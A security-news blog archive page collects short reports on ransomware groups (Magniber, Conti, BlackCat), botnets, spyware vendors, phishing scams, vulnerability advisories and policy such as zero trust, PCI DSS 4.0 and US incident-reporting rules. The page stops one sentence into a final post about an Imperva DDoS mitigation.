Search This Blog

Showing posts with label security threat. Show all posts

Zero Trust: The Need of the Hour


The continuous growth of network landscapes has demonstrated that traditional security methods like perimeter-based security architectures lack the finesse and control required to safeguard against new risks, both internal and external, hence, a new security technique is the need of the hour. 

Zero Trust: an all-in-one solution 

To mitigate future risks, Zero-trust, a security model designed in 2010 by John Kindervag of Forrester Research, will play an important role. It is a simple concept: trust nothing, scan everything. 

The model operates on the belief that by thwarting implicit trust and executing strong identity and access management (IAM) controls, businesses can ensure that only verified individuals, devices and apps can secure access to an organization's system. It greatly restricts the threat of unauthorized access, insider threats, and malicious assaults. 

The attackers specifically target small and medium-sized businesses due to their vulnerable security infrastructure. Recent research discovered that 94% of small firms face multiple challenges in maintaining their security posture because of a lack of skilled security personnel (40%), excessive manual analysis (37%), and the increasingly remote workforce (37%). 

According to the recent IBM report, zero-trust lowers the cost of data breaches by 43%. Additionally, Illumio reported that zero-trust segmentation saves nearly 40 hours per week and mitigates an average of five cyber attacks a year in a typical organization. 

The future of zero trust 

Over the past decade, zero trust has evolved from a concept discussed to tighten security to a widely deployed approach to increase securing organizations around the globe. According to the 2021 Microsoft report, 76% of organizations have at least started implementing a zero-trust strategy, while 35% believe they have fully installed it. 

However, multiple threat analysts believe that most organizations across all sectors have more work to do. Because zero trust requires layers of policies and technologies, hence, advancement will be required in the tools that can be employed, along with ways to refine how organizations deploy and use them.

The American government has already urged state and local governments, as well as universities and critical infrastructure firms, to move to a verify-then-trust principle. 

To help move zero trust forward, organizations around the globe will require to overhaul the entire cybersecurity department, as the current security team may not have the skills, experience, or staff. And they may need to recruit additional staff or services. 

During any transition period, security teams must practice tightly-controlled change management throughout, as hackers continue to challenge the security infrastructures. Businesses, specifically those with limited cybersecurity resources, as well as federal agencies, have an increasingly urgent need to implement zero-trust.

Critical Bug Identified in Kingspan TMS300 CS Water Tank Management System


Malicious hackers can remotely exploit a critical vulnerability in a water tank management system utilized by organizations in over 40 countries worldwide, and the manufacturer has not shown any inclination towards fixing the bug. 

The compromised product is designed by the water and energy wing of Kingspan building materials firm headquartered in Ireland. The Kingspan TMS300 CS water tank management system employs multiple mediums including screen, web server, application, online portal, or email to offer information on its products. It features wired and wireless multi-tank level measurements, alarms, and internet or local network connectivity. 

 Kingspan security bug

Earlier this week, Maxim Rupp, a researcher at CISA published an advisory regarding the product impacted by a critical vulnerability due to the lack of adequately implemented access-control guidelines, which allows an unauthenticated hacker to view or alter the product’s settings. 

The vulnerability paves a path for a hacker to access the product’s settings without verifying, and by merely searching for specific URLs. These URLs can be identified by browsing the web interface or via a brute force attack, the researcher explained. The flaw tracked as CVE-2022-2757 has received a CVSS score of 9.8. 

The malicious hacker attacker can exploit the security bug to alter various settings, including ones related to sensors, tank details, and alarm thresholds virtually from any part of the world, as long as they have access to the device’s web interface, Rupp explained. 

According to CISA, the impacted product is used worldwide in the water and wastewater systems sector, and it seems that the exploited settings could allow a hacker to cause some disruption in the targeted organization. 

“Kingspan has not responded to requests to work with CISA to mitigate these vulnerabilities. Users of the affected product are encouraged to contact Kingspan customer support for additional information,” the researcher added. 

Mitigation Tips 

CISA has provided the following recommendations for minimizing the threat posed by these types of vulnerabilities. 

• Limit network exposure for all control system devices and/or systems, and ensure they are not reachable from the Internet. 
• Locate control system networks and remote devices behind firewalls and isolate them from enterprise networks. 
• If necessary, employ secure methods, such as Virtual Private Networks (VPNs), to access the devices.

Spyware Group ‘Knotweed’ Employs Windows and Adobe Bugs to Target Firms Worldwide


Microsoft has unearthed an Austrian “cyber mercenary” group employing Windows and Adobe exploits to target organizations with spyware since at least 2021. 

Security analysts at Microsoft’s Threat Intelligence Center and Security Response Center said the organization is a private-sector offensive actor (PSOA) called Decision Supporting Information Research Forensic (DSIRF), but dubbed by Microsoft with the codename Knotweed. 

A cyber-weapons broker has launched multiple attacks on law firms, banks, and strategic consultancies in countries across the globe via spyware — dubbed Subzero — that allows its users to remotely and silently infiltrate a victim’s computer, phone, network infrastructure, and internet-linked devices.

"DSIRF has been linked to the development and attempted sale of a malware toolset called Subzero, which enables customers to hack into their targets' computers, phones, network infrastructure, and internet-connected devices," Microsoft said in a blog post. 

DSIRF promotes Subzero as a “next generation cyber warfare” tool that can secure full control of a victim’s PC, steal passwords and disclose its real-time location, according to a copy of an internal presentation released by Netzpolitik, a German news website, in 2021. 

The report claims that DSIRF, which reportedly has links to the Russian state, promoted its tool for use during the 2016 U.S. presidential election. The German government was also considering the purchase and use of Subzero to enhance its cyber defense. 

Microsoft said it has issued a software update to mitigate the use of the identified vulnerabilities. The tech giant has also released signatures of the malware to shield Windows users from exploits Knotweed was employing to help deliver its malware. 

More action is needed on a broader level, given that DSIRF will not be the last PSOA to target organizations, as Microsoft researchers explained in a brief sent to Congress on Wednesday. 

"We are increasingly seeing PSOAs selling their tools to authoritarian governments that act inconsistently with the rule of law and human rights norms," researchers explained. "We welcome Congress's focus on the risks and abuses we all collectively face from the unscrupulous use of surveillance technologies and encourage regulation to limit their use both here in the United States and elsewhere around the world."

Microsoft Warns of '8220 Group' Targeting Linux Servers


Microsoft Security Intelligence experts have issued a new warning against a known cloud threat actor (TA) group, dubbed 8220, targeting Linux servers to install crypto miners. 

“We observed notable updates to the long-running malware campaign targeting Linux systems by a group known as the 8220 gang. The updates include the deployment of new versions of a crypto miner and an IRC bot, as well the use of an exploit for a recently disclosed vulnerability,” the technology giant wrote in a series of tweets. 

According to Cisco's Talos Intelligence group, the 8220 gang has been operating since at least 2017, and primarily focuses on crypto mining campaigns. The threat actors are Chinese-speaking, the names of the group come from the port number 8220 used by the miner to communicate with the C2 servers. 

Over the past year, the group has actively upgraded its methodologies and payloads. In a recent campaign, the hacking group targeted i686 and x86_64 Linux systems and employed RCE exploits for CVE-2022-26134 (Atlassian Confluence) and CVE-2019-2725 (Oracle WebLogic) for initial access, Microsoft researchers stated. 

Once secured access to a target system, an evasive loader is downloaded from jira[.]letmaker[.]top. The loader eludes detection by clearing log files and disabling cloud monitoring and security tools. 

Subsequently, the loader downloads the pwnRig crypto miner and an IRC bot that runs commands from a command-and-control (C2) server. It would then maintain persistence by designing either a cron job or a script running every 60 seconds as nohup. 

“The loader uses the IP port scanner tool ‘masscan’ to find other SSH servers in the network and then uses the GoLang-based SSH brute force tool ‘spirit’ to propagate. It also scans the local disk for SSH keys to move laterally by connecting to known hosts.” 

To guard networks against this threat, Microsoft urged organizations to secure systems and servers, apply updates, and use good credential hygiene. “Microsoft Defender for Endpoint on Linux detects malicious behaviors and payloads related to this campaign.” 

The findings come after Akamai disclosed that the Atlassian Confluence vulnerability is experiencing a steady 20,000 exploitation attempts per day that are executed from nearly 6,000 IPs. However, these figures represent a substantial decline when compared to the peak of 100,000 the company witnessed upon the bug disclosure on June 02, 2022.

Artificial Intelligence: Main Weapon to Counter Cyber Attacks


The cyberattack surface in modern business environments is huge, and it’s continuing to evolve at a rapid pace. Cybersecurity staff often find themselves in a tricky situation to manage their cyber defenses. 

Threat actors are embracing AI and ML whole-heartedly, launching more sophisticated attacks that quickly learn and adapt to our inadequate defenses. On average business receives 10,000 alerts every day from the multiple software tools it uses to monitor cyber threats. To resolve the issues, there is a huge shortage of skilled security analysts, and they don’t want to be burdened by repetitive manual work. 

These challenges underscore the need for better ways to stem the tide of cyber-attacks. To analyze and enhance an organization’s cybersecurity posture artificial intelligence is particularly well suited. AI can help automate many tasks that a human analyst would often handle manually. These include automatically detecting unknown workstations, servers, code repositories, and other hardware and software on a network. 

Popular firms including FireEye, Microsoft, and Google are developing innovative AI approaches to detect malware, and monitor the spread of fake news. One notable success is Microsoft’s Cyber Signals program that uses AI to analyze 24 trillion security signals, 40 nation-state groups, and 140 hacker groups to produce cyber threat intelligence for C-level executives. 

American Federal agencies such as the Department of Defense and the National Science Foundation have invested tens of millions of dollars to develop advanced AI tools for extracting insights from data generated from the dark web and open-source software platforms such as GitHub. 

Additionally, AI-enabled analytics can assist in cracking the jargon and code words attackers develop to refer to their new tools, techniques, and procedures. One example is using the name Mirai to mean botnet. Hackers developed the term to hide the botnet topic from law enforcement and cyberthreat intelligence professionals. 

The path ahead 

Looking forward, there is massive room for growth for AI in cybersecurity. In particular, the predictions AI systems make based on the patterns they identify will help security analysts respond to emerging threats. 

AI is an intriguing tool that could help stem the tide of cyberattacks and, with careful cultivation, it could become a required tool for the next generation of cybersecurity professionals. The current pace of innovation in AI, however, suggests that fully automated cyber battles between AI attackers and AI defenders are likely years away.

New Variant of Magniber Ransomware is Targeting Windows 11 Users


Security analysts at 360 Security Center have unearthed a new strain of Magniber ransomware targeting Windows 11 systems. Since May 25, the attack volume of Magniber has surged significantly, and its primary transmission package names have also been upgraded, such as: win10-11_system_upgrade_software.msi, covid.warning.readme.xxxxxxxx.msi, etc. 

The ransomware is propagated via several online platforms, cracked software websites, fake pornographic websites, etc. When users visit these phony websites, they are lured to download from third-party network disks. 

According to researchers, the ransomware itself has not changed much, and can target multiple variants of Windows operating systems. The ransomware employs the RSA+AES encryption methodology to encrypt files. The RSA used is as long as 2048 bits, which is currently difficult to crack technically. 

After being encrypted by the ransomware, the file suffix is a random suffix, and each victim will have a separate payment page. If the ransom cannot be paid within the specified time, the link will be invalid. If the victim can pay the ransom within 5 days, he only needs to pay 0.09 Bitcoin, else the ransom will be doubled after 5 days. 

This is the second incident within two months hackers targeted Windows users. Earlier in April, the malicious actors employed fake Windows 10 updates to spread the Magniber ransomware strain. The fake Windows 10 updates were distributed under multiple names such as Win10.0_System_Upgrade_Software.msi and Security_Upgrade_Software_Win10.0.msi via platforms such as pirated sites, posing as legitimate cumulative or security updates. 

The malicious campaign started on April 8th, 2022, and has witnessed massive distribution worldwide since then. Meanwhile, it remains unclear how the fake Windows 10 updates are being promoted and distributed from fake warez and crack sites. 

According to security researchers, no safe decryptor exists for ransomware. Additionally, any weaknesses of the malware are also known to reverse its infection as of yet. The ransomware presently targets regular users and students, and not corporate customers. Thus, the users need to remain vigilant, avoid downloading cracked versions, and use legit sites only. 

The ransomware was first spotted in 2017 targeting victims in South Korea. Back in 2021, the ransomware was using the PrintNightmare exploit to Target Windows users, and earlier this year in January, it was distributed via Microsoft Edge and Chrome.

Multiple Organizations Targeted by Conti Ransomware Worldwide


The Conti ransomware gang is wreaking havoc with its assaults around the globe. The latest victim is the Peru MOF – Dirección General de Inteligencia (DIGIMIN), the premier intelligence agency in Peru. 

The ransomware group claimed to have stolen 9.41 GB of data from the agency responsible for national, military, and police intelligence, as well as counterintelligence. Targeting intelligence agency could lead to the disclosure of secret and confidential documents and pose a threat to national security. 

Last week, the US Department of State offered a reward of up to $15 million for information on the threat actor. The reward includes $10 million for the identification or the location of the leaders of the Conti ransomware gang. 

Additionally, $5 million is offered for information that results in the arrest /or conviction of any individual in any country conspiring to participate in or attempting to participate in a Conti variant ransomware incident. The reward is offered under the Department of State’s Transnational Organized Crime Rewards Program (TOCRP).

"The Conti ransomware group has been responsible for hundreds of ransomware incidents over the past two years," the statement read. "The FBI estimates that as of January 2022, there had been over 1,000 victims of attacks associated with Conti ransomware with victim payouts exceeding $150,000,000, making the Conti ransomware variant the costliest strain of ransomware ever documented." 

Costa Rica President Rodrigo Chaves declared a national cybersecurity emergency over the weekend, following a financially motivated Conti ransomware attack against his administration that has paralyzed the government and economy of the Latin American nation. Shortly after the incident occurred in April, the former President Carlos Alvarado publicly declined to pay a $10 million ransom demand. In turn, Conti has published nearly all of the 672 GB of data stolen from the government. 

After targeting the Costa Rican government, the ransomware group posted a message on their news site that the assault was merely a “demo version.” The group also said the attack was solely motivated by financial gain as well as expressed general political disgust, another signal of more government-directed attacks. 

The assaults by the Conti ransomware group are really concerning and even forced a nation to declare a national emergency. Thus, security experts recommended organizations invest in robust preventive strategies, including anti-ransomware solutions, frequent backups of data, network firewalls, and email gateways.

Scammers Employ Instagram Stories to Target Users


Instagram is the fourth most popular social media platform in the world, with over one billion monthly active users. Almost everyone, from celebrities to your kids, has an Instagram account. This global success makes it a very lucrative target for threat actors. 

According to BBC, the scamming has worsened over the past year, with the Instagram fraud reports increasing by 50% since the coronavirus outbreak began in 2020. Scammers just need a handful of those people who will help someone without thinking. And since they’re not after money, just a bit of someone’s time, they already have one foot in the door. 

The latest scam involves Instagram backstories. Fraudsters will ask you for help, tell their backstory, and put their fate in your hands. Here are some of the Instagram stories that fraudsters employ to target users: 

  •  "I’m launching my own product line." 
  •  "I’m in a competition and need you to vote for me." 
  • "I’m trying to get verified on Instagram and need people to confirm my fanbase with a link."
  • "I need a help link to get into Instagram on my other phone." This is the most common tactic employed by scammers. 
  • "I’m contesting for an ambassadorship spot at an online influencers program." This one is surprisingly popular, with fake influencers everywhere. 

Scammers try to get access to your Instagram account by sending you a suspicious link, either as an Instagram direct message or via email. They will then ask you not to click the link but merely take a screenshot and send the image back to them. The link is a legitimate Instagram “forgotten password” URL for your account, and fraudsters want you to screenshot it so they can use the URL to reset your password, take over your account, and lock you out. 

Regardless, any requests for link screenshots should be treated with extreme suspicion. Whether product lines or ambassador programs, you can safely ignore these messages. If you think you’ve been scammed, report it to Instagram. Change your password and enable two-factor authentication. If you reuse passwords, a scammer could break into more of your accounts. Change those passwords.

Magniber Ransomware Tricking Users via Fake Windows 10 Updates


Security analysts have unearthed a new ransomware campaign targeting Windows systems. Malicious actors are using fake Windows 10 updates to spread the Magniber ransomware strain. 

Since April 27, users around the world have been posting their stories on the BleepingComputer forum seeking a solution. According to the publication, these fake Windows 10 updates are being distributed under multiple names such as Win10.0_System_Upgrade_Software.msi and Security_Upgrade_Software_Win10.0.msi via platforms such as pirated sites, posing as legitimate cumulative or security updates.

Aside from these files, there also are other fake knowledge-based articles on Microsoft that can install the Magniber ransomware: 

• System.Upgrade.Win10.0-KB47287134.msi 
• System.Upgrade.Win10.0-KB82260712.msi 
• System.Upgrade.Win10.0-KB18062410.msi 
• System.Upgrade.Win10.0-KB66846525.msi

Based on the submissions to VirusTotal, this malicious campaign appears to have started on April 8th, 2022 and has seen massive distribution worldwide since then. Meanwhile, it remains unclear how the fake Windows 10 updates are being promoted and distributed from fake warez and crack sites. 

Once installed, Magniber will erase shadow volume copies and then encrypt files. When encrypting files, the ransomware will append a random 8-character extension, such as .gtearevf,. The ransomware also produces a README.html document in each folder which it encrypts. The documents then redirect users to Magniber’s Tor payment site, which is called 'My Decryptor'.

The payment site allows a victim to decrypt one file for free, contact 'support,' or determine cryptocurrency address to send coins to if they decide to pay the ransom. The ransomware demands tend to be around $2,500 or 0.068 bitcoin, Bleeping Computer reported. 

“The only 1 way to decrypt your files is to receive the private key and decryption program,” the ransom note reads. “Any attempts to restore your files with the third-party software will be fatal for your files!”

According to security researchers, no safe decryptor exists for the ransomware. Nor any weaknesses of the malware are known to reverse its infection. The ransomware presently targets regular users and students, and not corporate customers. Thus, the users need to remain vigilant, avoid downloading cracked versions, and use legit sites only. 

The ransomware was first spotted in 2017 targeting victims in South Korea. Back in 2021, the ransomware was using the PrintNightmare exploit to Target Windows user, and earlier this year in January, it was distributed via Microsoft Edge and Chrome.

Beware of New Phishing Campaign Targeting Facebook Users


Facebook users need to remain vigilant after researchers at Abnormal Security uncovered the new phishing campaign designed to steal passwords from admin that run company Facebook pages. The scam begins with a victim being sent a phishing email claiming to be from 'The Facebook Team’. 

The email warns that the user's account might be disabled or the page might be removed over repeatedly posting content that infringes on someone else’s rights. 

Once scaring a victim into thinking their Facebook profile could soon be taken down, the victim is invited to appeal the report by clicking on a link that the security researchers said goes to a Facebook post – and within this post, there's another link that directs users to a separate website. To file an ‘appeal’, a Facebook user is told to enter sensitive information including their name, email address, and Facebook password. 

All this information is sent to the threat actor, who can exploit it to log in to the victim's Facebook page, gather sensitive details from their account, and potentially lock them out of it. If the victim re-uses their Facebook email address and password for other websites and applications, the attacker can access those too. One of the reasons phishing attacks like this are successful is because they create a sense of urgency. 

“What makes this attack interesting (and particularly effective) is that the threat actors are leveraging Facebook’s actual infrastructure to execute the attack. Rather than sending the target straight to the phishing site via a link in the email, the attackers first redirect them to a real post on Facebook. Because the threat actors use a valid Facebook URL in the email, it makes the landing page especially convincing and minimizes the chance the target will second-guess the legitimacy of the initial email,” researchers explained. 

“In addition, it appears the attackers are targeting accounts of people who manage Facebook Pages for companies. For these individuals, a disabled Facebook account wouldn’t just be an inconvenience; it could have an impact on their marketing, branding, and revenue. If they believed their account was at risk, they would be particularly motivated to act quickly.” 

If you have already been a victim of this campaign, or want to stay safe from any future threats, Facebook on its website has issued recommendations for its users. The social network advises anyone who thinks they’ve fallen for a phishing scam to report it, change their password, and make sure they log out of any devices they don’t recognize. Facebook also recommends users turn on multi-factor authentication, which helps to add an extra level of security to their account.

Critical Vulnerability Identified in Ever Surf Blockchain Wallet


A vulnerability identified in the browser version of the Ever Surf blockchain wallet could have allowed attackers full control over a victim’s wallet and subsequent funds, say threat analysts at Check Point Research. 

Available on Google Play and Apple iOS Store, Ever Surf is described as a cross-platform messenger, blockchain browser, and crypto wallet for the Everscale blockchain network. It currently has nearly 670,000 active accounts worldwide and claims it has facilitated at least 31.6 million transactions.

According to Check Point researchers, the web version of the Ever Surf blockchain wallet suffered from a relatively simple bug that allowed malicious actors to exfiltrate private keys and plant phrases stored in local browser storage. To do that, threat actors first needed to secure the encrypted keys of the wallet, which is usually done via malicious browser extensions, infostealer malware, or plain old phishing.

Subsequently, the bad actors could have used a simple script to perform decryption. The susceptibility made decryption possible in “just a couple of minutes, on consumer-grade hardware," the researchers stated. 

CPR reported the vulnerability to Ever Surf developers, who then published a desktop version that mitigates the flaw, the company said in a press release. The web version is now declared deprecated and should only be used for development purposes. Seed phrases from accounts that store real value in crypto should not be used in the web version of Ever Surf, the researchers warned. 

“Everscale is still in the early stages of development. We assumed that there might be vulnerabilities in such a young product,” said Alexander Chailytko, Cyber Security, Research & Innovation Manager at Check Point Software 

“When working with cryptocurrencies, you always need to be careful, ensure your device is free of malware, do not open suspicious links, and keep OS and antivirus software updated. Despite the fact that the vulnerability we found has been patched in the new desktop version of the Ever Surf wallet, users may encounter other threats such as vulnerabilities in decentralized applications, or general threats like fraud, phishing,” Chailytko added. 

To mitigate the risks, researchers recommended users not to follow suspicious links, particularly those sent from unknown sources, always keep their OS and antivirus software updated, and avoid downloading any software or browser extensions before verifying the identity of the source.

FBI Issues Warning as BlackCat Ransomware Targets More Than 60 Organizations Worldwide


An FBI flash alert released this week suggests that the law enforcement agency has identified at least 60 ransomware attacks worldwide by the BlackCat (ALPHV) group between November 2021 and March 2022. 

The flash alert highlights the tactics, techniques, and procedures (TTPs) employed and indicators of compromise (IOCs) associated with ransomware groups spotted during FBI investigations.

According to the FBI's Cyber Division, BlackCat also tracked as ALPHV and Noberus "is the first ransomware group to do so successfully using RUST, considered to be a more secure programming language that offers improved performance and reliable concurrent processing."

BlackCat's ransomware executable is also highly customizable and is loaded with several encryption methods and options that make it easy to adapt attacks to a wide range of industrial organizations. "Many of the developers and money launderers for BlackCat/ALPHV are linked to Darkside/Blackmatter, indicating they have extensive networks and experience with ransomware operations," the FBI added. 

Security researchers recently revealed an increased interest from BlackCat operators in targeting industrial organizations. BlackCat affiliates often demand ransom payments of millions of dollars, but they have been observed accepting lower payments after negotiations with their victims. 

For initial access, the FBI explains, BlackCat employs compromised user credentials. Next, Active Directory user and administrator accounts are compromised and malicious Group Policy Objects (GPOs) are used to deploy the ransomware, but not before victim data is exfiltrated. 

As part of observed BlackCat assaults, PowerShell scripts, Cobalt Strike Beacon, and authentic Windows tools and Sysinternals utilities have been used. The malicious actors were also seen disabling security features to move unhindered within the victim’s network. 

As usual, the FBI recommends not paying the ransom, as this would not guarantee the recovery of compromised data, and urges organizations to proactively deploy cybersecurity defenses that can help them prevent ransomware attacks. 

Since the start of the year, the notorious group has taken credit for ransomware attacks on US schools like Florida International University and North Carolina A&T University and has already breached dozens of US critical infrastructure organizations. 

The group was first spotted in November 2021 and became known for aggressively posting details about its victims publicly. Emsisoft threat analyst Brett Callow and others previously said the group is a rebrand of the BlackMatter and DarkSide ransomware groups, something the FBI also highlighted in its notice.

Cyware is Changing the Cybersecurity Landscape


Cybercriminals often have an equivalent or sometimes superior technical prowess as their cyber security counterparts! This has led to an ever-evolving landscape of cybercrimes that constantly outsmart modern cyber security technologies. So, does that end our fight against cyber threats? No, the answer lies in increasing cognizance and implementation of automation technologies.

Akshat Jain, CTO & Co-founder, of Cyware shared his vision and the role of automation technologies in eliminating cyber threats. Here are the key points he discussed in an interview with Elets CIO: -

The vision of Cyware 

Anuj Goel and I started the company in 2016 with the vision of assisting organizations to reimagine the way they approach and manage cybersecurity. Our prior experiences in steering large security and technology teams made us realize the inadequacies of reactive, manually-driven, and intelligence-deprived cybersecurity strategies that put organizations at a disadvantage against threat actors. 

Today, Cyware is helping organizations transform their security postures through our cyber fusion solutions that combine the capabilities of Threat Intel Platforms (TIP) and Security Orchestration, Automation, and Response (SOAR) to make security proactive and to integrate and accelerate different security functions, including threat detection, response, vulnerability management, threat hunting, and others. 

Role of Automation in advanced security operations 

Automation plays an important role in the enrichment, correlation, analysis, and last-mile delivery of this threat intelligence to different teams within an organization or with external partners, industry peers, regulatory bodies, and information sharing community (ISAC/ISAO) members, and others. Using this telemetry, they are expected to take mitigating actions to contain and respond effectively to those threats. 

“Automation assists in detecting the variety of threats by using historical indicators of compromise (IOCs), and the knowledge of threat actors’ tactics, techniques, and procedures (TTPs) to trigger machine-driven detection alerts. From there, security teams can once again automate containment actions to ensure that a threat does not spread laterally across their systems and networks, thereby minimizing the impact of a threat. 

Response actions needed to finally eliminate the threat can also be executed rapidly through automated workflows leveraging security orchestration for information exchange and actioning across a variety of tools,” Jain explained. 

 Importance of Cyber Innovation and Global Collective Defence in the cloud-first economy

Cyber innovation is the need of the hour to help organizations adopt new security technologies and strategies to deal with these new challenges. With the increasingly distributed nature of today’s work environment, it is essential to boost collaboration in cybersecurity across all sectors to develop collective defense strategies for resilient cyberspace for all. 

As threat actors become stealthier and quicker, organizations should also make smart use of threat intel collected from both internal and external sources to drive proactive actions against potential threats to their infrastructure. 

Cyware’s progress in designing a first-of-its-kind global collective defense network 

Cyware is creating the first-of-its-kind global collective defense network through its advanced cross-sectoral threat intel sharing platforms that link all the stakeholders within an organization, as well as its business partners, vendors, industry peers, national CERTs, information sharing communities (ISACs/ISAOs), and others.

The network will assist organizations in sharing strategic, tactical, technical, and operational threat intelligence in real-time to ensure a timely response to various threats. More than 20 information-sharing communities (ISACs, ISAOs, and CERTs) from financial services, automotive, space, aviation, healthcare, retail, energy, and manufacturing sectors, among others, are using Cyware’s solutions to share threat intelligence with their 10,000+ member organizations.

PCI DSS Launches New Version to Tackle Cyber Security Threats

A new variant of the PCI Data Security Standard (PCI DSS) has been posted today by the PCI Security Standards Council (PCI SSC), the global payment security forum. The standard version is 4.0, it offers a baseline of operational and technical needs designed to improve payment security, replacing version 3.2.1 to assist combat surfacing threats and technologies. Besides this, the updates are built for enabling innovative methods to tackle these new threats. 

PCI SCC says these changes were motivated by feedback from the global payments industry over the past three years, including more than 6000 items from over 200 organizations. The latest changes in the PCI DSS v4.0 include the Expansion of Requirement 8 to apply multi-factor authentication (MFA) for all access to the cardholder data scenario. Up-to-date firewall terminology to network security controls, supporting a wider range of tech used to reach the security objectives earlier fulfilled by firewalls. 

 Improved flexibility for enterprises to show how they are incorporating different techniques to meet security objectives. Adding targeted threat analysis enables organizations to decide how frequently they do certain actions best suited for their organization's risk exposure and needs. The present version, v3.2.1, will remain online for two years until March 31, 2024. This will give associated organizations some time to know v4.0 and implement these updates. PCI SCC has also released some supporting documents besides the updated standard in the PCI SSC Document Library. 

It includes the summary of changes from PCI DSS v3.2.1 to v4.0, v4.0 Report on Compliance (ROC) Template, ROC FAQs, and ROC Attestations of Compliance (AOC). Additionally, Self-Assessment Questionnaires (SAQs) will be posted in the future. “The industry has had unprecedented visibility into, and impact on, the development of PCI DSS v4.0. Our stakeholders provided substantial, insightful, and diverse input that helped the council effectively advance the development of this version of the PCI Data Security Standard,” said Lance Johnson, executive director of PCI SSC.

US Federal Agencies Warn of Cyber Attacks Targeting UPS Devices


The US Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Energy released a joint advisory warning for U.S. organizations to secure Internet-connected uninterruptible power supply (UPS) devices from ongoing cyber assaults.

UPS devices are regularly used as emergency power backup solutions in mission-critical environments and are also equipped with an internet of things (IoT) capability, enabling the administrators to carry out power monitoring and routine maintenance. But as is often the case, such features also expose them to malicious attacks. 

"The Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Energy are aware of threat actors gaining access to a variety of internet-connected uninterruptible power supply (UPS) devices, often through unchanged default usernames and passwords," the federal agencies said.

"Organizations can mitigate attacks against their UPS devices, which provide emergency power in a variety of applications when normal power sources are lost, by removing management interfaces from the internet." 

To safeguard against such threats, CISA and DoE are recommending concerned entities ensure all UPS systems are disconnected from the internet. If linking their management interfaces to the Internet is not viable, admins are advised to put the devices behind a virtual private network (VPN), enable multifactor authentication (MFA), and use strong passwords or passphrases in accordance with the National Institute of Standards and Technology guidelines. 

Additionally, the advisory includes auditing usernames and passwords to ensure that they’re not still factory-default or otherwise easily guessed or cracked. U.S. organizations are also urged to execute login timeout/lockout policies to mitigate these ongoing assaults against UPSs and similar systems. Besides default credentials, malicious actors can also exploit critical security loopholes to enable remote takeovers of uninterruptible power supply (UPS) devices and allow them to burn them out or disable power remotely. 

The warnings come three weeks after security firm Armis uncovered multiple high-impact vulnerabilities in APC Smart-UPS devices that could be exploited remotely by unauthenticated attackers without user interaction as a physical weapon. Two of the main vulnerabilities include flaws in SmartConnect’s TLS implementation – the first is a buffer overflow memory bug, and the second is a problem with the way SmartConnect’s TLS handshake works.

Muhstik Botnet Targeting Redis Servers by Exploiting Recently Published Bug


The Muhstik botnet infamous for spreading via web application exploits, has been spotted targeting and exploiting a Lua sandbox escape flaw (CVE-2022-0543) in Redis severs after a proof-of-concept exploit was publicly released. 

Lua sandbox escape flaw was uncovered in the open-source, in-memory, key-value data store in February 2022 and could be exploited to achieve remote code execution on the underlying machine. The vulnerability is rated 10 out of 10 on the severity scale. 

"Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host," Ubuntu explained in an advisory released last month. 

The attacks exploiting the new flaw started on March 11, 2022, leading to the retrieval of a malicious shell script ("") from a remote server, which is then utilized to fetch and implement the botnet binaries from another server, Juniper Threat Lab researchers explained. 

According to Chinese security firm Netlab 360, the Muhstik botnet is known to be active since March 2018 and is monetized for performing coin mining activities and staging distributed denial-of-service (DDoS) attacks. 

The botnet propagates by exploiting home routers, but researchers noticed multiple attempted exploits for Linux server propagation. The list of compromised routers includes GPON home router, DD-WRT router, and the Tomato router. The vulnerabilities exploited by Muhstik over the years are as follows – 

• CVE-2017-10271 (CVSS score: 7.5) – An input validation vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware 
• CVE-2018-7600 (CVSS score: 9.8) – Drupal remote code execution vulnerability 
• CVE-2019-2725 (CVSS score: 9.8) – Oracle WebLogic Server remote code execution vulnerability 
• CVE-2021-26084 (CVSS score: 9.8) – An OGNL (Object-Graph Navigation Language) injection flaw in Atlassian Confluence, and 
• CVE-2021-44228 (CVSS score: 10.0) – Apache Log4j remote code execution vulnerability (aka Log4Shell) 

"This bot connects to an IRC server to receive commands which include the following: download files, shell commands, flood attacks, [and] SSH brute force," Juniper Threat Labs researchers said in a report published last week. In light of active exploitation of the critical security loophole, users are strictly advised to act quickly to patch their Redis services to the latest version.

New Bipartisan Bill Would Require Firms to Report Cyber Incidents Within 72 hours


Financial institutions critical to U.S. national interests will now have to report substantial cyber assaults and ransom payments to the federal government, an Associated Press report said, under a bill passed by Congress and expected to be signed by President Joe Biden.

The move comes amid the escalating war in Ukraine and concerns of possible Russian cyber threats to the U.S. firms. Last year, multiple private and government organizations were jolted by a series of high-profile digital espionage campaigns and disruptive ransomware attacks. The reporting will provide federal government much greater visibility into hacking efforts that target private firms, which often have skipped going to the FBI or other agencies for assistance. 

The reporting requirement was approved by the House and Senate on Thursday. It is expected to be signed into law by President Biden soon. “It’s clear we must take bold action to improve our online defenses,” stated Sen. Gary Peters, a Michigan Democrat who leads the Senate Homeland Security and Government Affairs Committee.

AP wrote that the new rules require any entity considered part of America’s critical infrastructure, including finance, transportation, and energy, to report any “substantial cyber incident” within 72 hours, and any ransomware payment they make within 24 hours, to the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency. 

According to Heather Hogsett, a senior leader of the Bank Policy Institute’s technology policy division, the 36-hour notices of service disruption “allow bank regulators to keep a pulse on what is happening in the country’s financial services industry” while the 72- and 24-hour notices to CISA will allow the agency to “produce reports about threat actors and provide early warning of potential attack vectors.”

In recent years ransomware attacks have flourished beyond expectation and have targeted multiple high-profile organizations. Last year, the ransomware operators targeted the biggest U.S. fuel pipeline and the world’s biggest meat packing company. 

The state hackers based in Russia and China have had success in spying on and hacking U.S. targets, including those that are deemed critical infrastructure, Reuters reported.

Security experts and government officials are concerned that Russia's war in Ukraine has increased the threat of cyberattacks against U.S. entities, by either state or proxy actors. Many ransomware operators live and work in Russia. 

“As our nation rightly supports Ukraine during Russia’s illegal unjustifiable assault, I am concerned the threat of Russian cyber and ransomware attacks against U.S. critical infrastructure will increase. The federal government must be able to quickly coordinate a response and hold these bad actors accountable," said Sen. Rob Portman, a Republican from Ohio.

Imperva Mitigates 2.5 million RPS Ransom DDoS Assaults Targeting Unnamed Firm


Imperva, a cyber security software and services firm on Friday claimed it thwarted a massive 2.5 million RPS (requests per second) ransom DDoS attack targeting an unnamed company. 
